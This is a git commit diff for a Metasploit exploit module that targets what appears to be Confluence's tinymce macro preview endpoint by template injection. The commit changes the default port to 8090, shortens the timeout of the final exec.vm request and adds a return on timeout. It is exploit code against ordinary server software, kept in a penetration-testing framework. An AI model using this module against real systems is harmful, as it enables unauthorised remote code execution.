Updated RPORT to 8090, reduced timeout of final exec.vm request to 5 sec
parent
8b61c5edf5
commit
0aaae062a4
|
@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
],
|
],
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' =>
|
||||||
{
|
{
|
||||||
'RPORT' => 80,
|
'RPORT' => 8090,
|
||||||
'SRVPORT' => 8021,
|
'SRVPORT' => 8021,
|
||||||
},
|
},
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
|
@ -197,10 +197,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
#
|
#
|
||||||
# @param service_url [String] Address of template to injection.
|
# @param service_url [String] Address of template to injection.
|
||||||
# @return [void]
|
# @return [void]
|
||||||
def inject_template(service_url)
|
def inject_template(service_url, timeout=20)
|
||||||
|
|
||||||
uri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview')
|
uri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview')
|
||||||
|
|
||||||
|
if service_url.include?("exec.vm")
|
||||||
|
timeout=5
|
||||||
|
end
|
||||||
|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'uri' => uri,
|
'uri' => uri,
|
||||||
|
@ -221,11 +225,12 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
}
|
}
|
||||||
}.to_json
|
}.to_json
|
||||||
})
|
}, timeout=timeout)
|
||||||
|
|
||||||
unless res
|
unless res
|
||||||
unless service_url.include?("exec.vm")
|
unless service_url.include?("exec.vm")
|
||||||
print_warning('Connection timed out in #inject_template')
|
print_warning('Connection timed out in #inject_template')
|
||||||
|
return
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue